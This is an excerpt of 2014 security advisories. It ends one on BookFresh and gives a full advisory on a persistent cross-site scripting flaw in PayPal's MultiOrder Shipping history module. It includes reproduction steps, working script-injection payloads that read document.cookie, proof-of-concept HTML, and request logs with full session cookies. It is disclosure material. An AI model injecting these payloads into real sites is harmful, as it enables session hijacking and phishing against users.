      Cookie[exp_last_visit=1098793409; exp_last_activity=1414153682; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22pricing%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; exp_stashid=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A40%3A%22a6f1b5568526e667fc23b9df8b909c4033ccd4d9%22%3Bs%3A2%3A%22dt%22%3Bi%3A1414153409%3B%7D; __utma=172549936.1040555376.1414153707.1414153707.1414154524.2; __utmc=172549936; __utmz=172549936.1414154524.2.2.utmcsr=send_invite|utmccn=bf_trans::14-Oct-24|utmcmd=email; PHPSESSID2=fba6f3efafeba128a152ccac7f385a62; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1414153426800r0.9022819634031048; optimizelyBuckets=%7B%7D; user_segment=Prospect; 0=; 1=; ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; hitlog_previous_view=ajax; ajs_user=%7B%22id%22%3A%22336105318%22%2C%22traits%22%3A%7B%22email%22%3A%22bkm%40evolution-sec.com%22%2C%22created%22%3A1414178914%2C%22firstName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22lastName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22AccountType%22%3A%22Freebie%22%2C%22Partner%22%3A%22Site%22%2C%22V2Enabled%22%3A%22yes%22%2C%22BusinessCategory%22%3A%22auto%22%7D%7D; StaffFilterActive=; FCView=agendaWeek; FCWeekends=true; wcsid=papxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; hblid=ZjHg0Fr4qFgx2rsW4491G5P3JN8yLoJ1; _oklv=1414154886305%2CpapxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; olfsk=olfsk7646853271129184; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1414153790074%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9558-780-10-9044; kvcd=1414154695823; km_ai=wRxGgAKNuV%2F1hVqbidBhjL91IRg%3D; km_uq=; km_lv=x; 
mp_2197551b77685f5afde96bfaeb663423_mixpanel=%7B%22distinct_id%22%3A%20%22149421cca1bb15-04ab1d7c297b6f8-41534336-1fa400-149421cca1ca98%22%2C%22Site%22%3A%20%22v3%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fhackerone.com%2Fbookfresh%22%2C%22%24initial_referring_domain%22%3A%20%22hackerone.com%22%2C%22__alias%22%3A%20%22336105318%22%2C%22mp_name_tag%22%3A%20%22bkm%40evolution-sec.com%22%2C%22AccountType%22%3A%20%22Freebie%22%2C%22Partner%22%3A%20%22Site%22%2C%22V2Enabled%22%3A%20%22yes%22%2C%22BusinessCategory%22%3A%20%22auto%22%2C%22%24created%22%3A%20%222014-10-24T19%3A28%3A34.000Z%22%2C%22%24email%22%3A%20%22bkm%40evolution-sec.com%22%2C%22%24first_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22%24last_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%7D]
      Connection[keep-alive]
   Response Header:
      Server[nginx/1.4.4]
      Date[Fri, 24 Oct 2014 13:29:14 GMT]
      Content-Type[application/json]
      Content-Length[1012]
      Connection[keep-alive]
      X-Powered-By[PHP/5.3.28]
      Set-Cookie[ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; expires=Fri, 24-Oct-2014 15:29:14 GMT; path=/; httponly]
      p3p[CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      status[200]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]


Reference(s):
https://www.bookfresh.com/cindex.php
https://www.bookfresh.com/cindex.php/backbone_api/clients/
https://www.bookfresh.com/cindex.php/backbone_api/clients/find?query=&offset=0
https://www.bookfresh.com/cindex.php/backbone_api/clients/9f29673d878097fd23de3bae1523da44


Solution - Fix & Patch:
=======================
The security vulnerability can be patched by securely restricting the input of special characters and script code tags. Parse and encode the vulnerable form inputs (phone and message) in the clients invite module to prevent persistent script code execution through the service notification mails.


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the mail/DB encoding of the web server is estimated as medium (CVSS 3.9).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

PayPal Inc BugBounty #107 MultiOrder Shipping (API) - Persistent History Vulnerability

Document Title:
===============
PayPal Inc BugBounty #107 MultiOrder Shipping (API) - Persistent History Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1048

PayPal Security UID:  dq115aYq


Release Date:
=============
2014-10-27


Vulnerability Laboratory ID (VL-ID):
====================================
1048


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official PayPal Inc (Core & API) Shipping Application.


Vulnerability Disclosure Timeline:
==================================
2014-10-27:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Shipping & MOS Application - API 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official PayPal Inc (Core & API) MultiOrder Shipping web application. The vulnerability allows remote attackers to inject their own malicious script code on the application side with a persistent attack vector.

The persistent vulnerability is located in the `history` (activity) module of the MultiOrder Shipping application API. Remote attackers can evade the filter of the API by using a manipulated tracking information value. The injection request passes through the main include of the MultiOrder Shipping tracking details input field. After the local injection via a POST request to the attacker's own profile, the attacker needs to interact with the manipulated data. The injected script code executes in the history module of the local user (attacker, multi-user account) but also in the history module of another client (remote). The code executes only when the history is reviewed, i.e. when the saved vulnerable item is requested via GET; execution occurs directly on review of the full history on both client-side ends. The vulnerability is located on the application side of the service, the attack vector is persistent, and the request method used to inject is POST.

Local
The vulnerability is exploitable for stand-alone user accounts (locally) but also for multi-user accounts in PayPal via the MultiOrder Shipping service. The exploitation is remote and the risk is medium because of the following scenario: a remote attacker creates multiple customer orders with injected payloads in the tracking information value. When the admin merchant account user logs in and checks the PayPal MultiOrder Shipping orders, the exploit is triggered. On interaction with a manipulated tracking id the script code executes in another profile because of the saved, merged information in the portal service.

Remote
The vulnerability is exploitable for stand-alone user accounts in connection with another shipping user (remotely) who interacts. On interaction with another PayPal API shipping user the request can be saved persistently to the other user's account history. The payload is injected as usual into the history information (tracking information), and during the exploitation phase the same entry becomes visible in the same module of the other user's account. To successfully trigger the issue it is required to wait, after the information has been stored during the interaction with the target user, until the entry appears in the (monthly) history of both the attacker's and the other user's account.

The security risk of the filter bypass and application-side input validation web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.9. Exploitation of the persistent web vulnerability requires a low-privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent loading of malicious script code or persistent web module context manipulation.


Vulnerable Service(s):
[+] Paypal Inc - PayPal MultiOrder Shipping Application (Core & API)

Vulnerable Module(s):
[+] History

Vulnerable Parameter(s):
[+] tracking id

Affected Module(s):
[+] History Listing - Tracking
[+] History Sidebar Details – Tracking


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low-privilege PayPal web application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability, follow the information and steps below.

Manual steps to reproduce the security vulnerability in a local PayPal account with multi-user access privileges, and remotely by event interaction.

1. Register a PayPal US account and log in as a regular user after the verification process
2. Click the Tools button in the main menu and scroll down to the MultiOrder Shipping web application
3. Log in and switch to the pickup profile
4. Include the payload in the tracking value and save the data
5. Interact with the details with another client/user by an event
Note: Wait some time for the context to be listed as an item in the history module
6. Open the history listing tab and click the search form
7. Search for the date (event) on which the item interaction with the other client happened
Note: The execution also occurs locally in the attacker account when reviewing the malicious item through the history.
8. The injected payload (script code) executes in the main list of the history item results and also in the right sidebar, through the tracking id value stored in the DBMS
Note: After the interaction the other PayPal client user only needs to review the history module with all results to execute the code remotely (with interaction).
9. To successfully reproduce the security vulnerability, the other client only needs to interact by viewing the history event listing!

Payload(s):
>"%20<iframe src="x/a_003.txt" onload="alert('POC-BENJAMIN!')[PERSISTENT INJECTED SCRIPT CODE!]">
<%20>"<iframe src=http://www.vuln-lab.com onload="alert(document.cookie)[PERSISTENT INJECTED CODE!]">

Note: After PayPal's fix and patch the payload no longer executes in the main index. Only the history module executes the context when the item is listed as a result in the bottom context listing. The issue can be exploited locally for multi-user accounts or remotely by interaction through the vulnerable history (tracking id) module.

PoC Code: Details - Tracking# in the History Module Item List

<div class="psSideBar" id="HistoryDetails"><div class="psSideBarHeader" id="HistoryDetails_header">
<img title="Minimize this section" class="psSideBarMinIcon" src="shipping/images/psside_min.gif" id="HistoryDetails_min">
<img title="Maximize this section" class="psSideBarMaxIcon" src="shipping/images/psside_max.gif" id="HistoryDetails_max">
<span class="psSideBarTitle" id="HistoryDetails_title">Details</span></div><div class="psSideBarContent"
id="HistoryDetails_content"><div class="psSideFrame" id="SideHistoryCarrier"><div class="psSideFrameHeader"
id="SideHistoryCarrier_header"><a title="" class="psSideFrameButton" id="SideHistoryDetailsBtn" href="javascript:
psPushButton_OnLink('SideHistoryDetailsBtn');"><span class="psSideFrameButtonText" id="SideHistoryDetailsBtn_text">
details...</span></a><a title="" class="psSideFrameButton" id="SideHistoryScheduleBtn" href="javascript:
psPushButton_OnLink('SideHistoryScheduleBtn');"><span class="psSideFrameButtonText" id="SideHistoryScheduleBtn_text">
schedule...</span></a><a title="" class="psSideFrameButton" id="SideHistoryCancelBtn" href="javascript:
psPushButton_OnLink('SideHistoryCancelBtn');"><span class="psSideFrameButtonText" id="SideHistoryCancelBtn_text">
cancel</span></a><span class="psSideFrameTitle" id="SideHistoryCarrier_title">Carrier Pickup™</span></div>
<div class="psSideFrameContent" id="SideHistoryCarrier_content" style="display: block;">
        <div style="display: block;" id="SideHistNoPickups">No Carrier Pickups™ scheduled.</div>
        <div id="SideHistPickupList" style="display: none"></div>
</div></div><div class="psSideFrame" id="SideHistoryBatch"><div class="psSideFrameHeader" id="SideHistoryBatch_header">
<a title="" class="psSideFrameButton" id="SideHistoryBatchBtn" href="javascript: psPushButton_OnLink('SideHistoryBatchBtn');">
<span class="psSideFrameButtonText" id="SideHistoryBatchBtn_text">details...</span></a><span class="psSideFrameTitle"
id="SideHistoryBatch_title">Transaction Details</span></div><div class="psSideFrameContent" id="SideHistoryBatch_content"
style="display: block;">
        BATCH INFO HERE
</div></div><div class="psSideFrame" id="SideHistoryPrintedLabel"><div class="psSideFrameHeader"
id="SideHistoryPrintedLabel_header"><a title="" class="psSideFrameButton" id="SideHistoryPrintedLabelBtn"
href="javascript: psPushButton_OnLink('SideHistoryPrintedLabelBtn');"><span class="psSideFrameButtonText" id="SideHistoryPrintedLabelBtn_text">details...</span></a><span class="psSideFrameTitle"
id="SideHistoryPrintedLabel_title">Label Details</span></div><div class="psSideFrameContent"
id="SideHistoryPrintedLabel_content" style="display: block;">
        PRINTED LABEL INFO HERE
</div></div><div class="psSideFrame" id="SideHistoryManual"><div class="psSideFrameHeader"
id="SideHistoryManual_header"><span class="psSideFrameTitle" id="SideHistoryManual_title">
Shipment Details</span></div><div class="psSideFrameContent" id="SideHistoryManual_content"
style="display: block;"><table>
<tbody><tr><td colspan="2">Date: 2013/08/05</td></tr>
<tr><td colspan="2"> </td></tr>
<tr><td colspan="2">Shipped via: Other</td></tr>
<tr><td colspan="2">Tracking #: <iframe src="x/a_003.txt" onload="alert('POC-BENJAMIN!')[PERSISTENT INJECTED SCRIPT CODE!]"></td></tr>
</table>
<table><br>
<tr><td
 valign=top>Ship To:</td><td>POC
POC1<br>poc<br>poc<br>alskaf, AK
44332</td></tr>
<tr><td valign=top>Ship
From:</td><td>"/><br>"/>a%20/>"><img
 src="t.png"
onerror=prompt(document.cookie)></img>

Note: The red highlighted text in the PoC source code shows where the application-side script code execution takes place. The orange highlighted text shows the date and the module context of the affected vulnerable service.

PoC Code: Tracking# Listing - History Index

<div style="overflow: scroll; height: 131px; display: block;" class="psTableContent"
id="HistoryListTable_content"><div style="display: none;" class="psTableContentMsg">Loading order data...</div><table class="psTableList" id="HistoryListTable_table"cellspacing="1"> <tbody><tr class="psTableListRowSelected" id="undefined_row_0"><td class="psTableListCell" style="width: 25%;" id="undefined_row_0_cell_0">POC POC1</td><td class="psTableListCell" style="width: 15%;" id="undefined_row_0_cell_1">Other</td><td class="psTableListCell" style="width: 30%;" id="undefined_row_0_cell_2"><iframe src="PayPal%20Multi%20Order%20Shipping_files/a_003.txt" onload="alert('POC-NEW-BEN')"></iframe></td>
Note: The red marked text shows the script code payload after the injection via POST request. By evading the input filter, the vulnerable tracking id value manipulates the main history module item listing. The orange marked text shows the context next to the execution.

--- PoC Session Logs [GET] (Request & Execution) ---

1:35:52.538[922ms][total 922ms] Status: 200[OK]
POST https://ship.paypal.com/cgi-bin/shipweb?cmd=get-scheduled-carrier-pickups Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Content Size[-1] Mime Type[text/xml]
Request Headers:
Host[ship.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[text/xml; charset=UTF-8]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
Content-Length[138]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; 
HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=kI12EvI4jupBZoWIECOc9T4DAgMQztXQvuEEXvgXYkp2uw3ZrcIHKucoZju8qBoJzw-tZeo3uRj_beoTkd3nUck2FvyQPb2kiSMwDHjyBuuidDEd; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   Post Data:
      POST_DATA[</GetScheduledCarrierPickups>]
   Response Headers:
      Date[Wed, 14 Aug 2013 23:35:55 GMT]
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Set-Cookie[RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; domain=.paypal.com; path=/; Secure; HttpOnly]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/xml]

Note: The first request shows how the researcher moved through the pickup module to the vulnerable history module in the PayPal MultiOrder Shipping web application.

1:35:55.409[0ms][total 0ms] Status: pending[]
GET https://ship.paypal.com/powership/a Load Flags[LOAD_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[ship.paypal.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; 
HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; 